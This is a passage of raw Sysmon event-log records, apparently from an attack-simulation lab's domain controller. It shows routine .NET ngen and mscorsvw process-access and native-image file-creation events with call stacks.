tdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.406{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.406{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8801-00000000A301}2268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.344{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8801-00000000A301}2268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.344{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8801-00000000A301}2268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.328{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\5e8-0\Microsoft.GroupPolicy.Targeting.Interop.dll2021-01-18 13:45:58.328 10341000x80000000000000005794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.234{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.219{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.219{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8601-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.188{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8601-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.188{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8601-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.172{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a0c-0\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll2021-01-18 13:45:58.172 10341000x80000000000000005787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.094{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.078{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.078{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.063{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8401-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.047{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8401-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8401-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.031{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bd4-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-01-18 13:45:58.031 10341000x80000000000000005842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.813{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9501-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.813{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9501-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.813{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9501-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9401-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.766{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9401-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9401-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 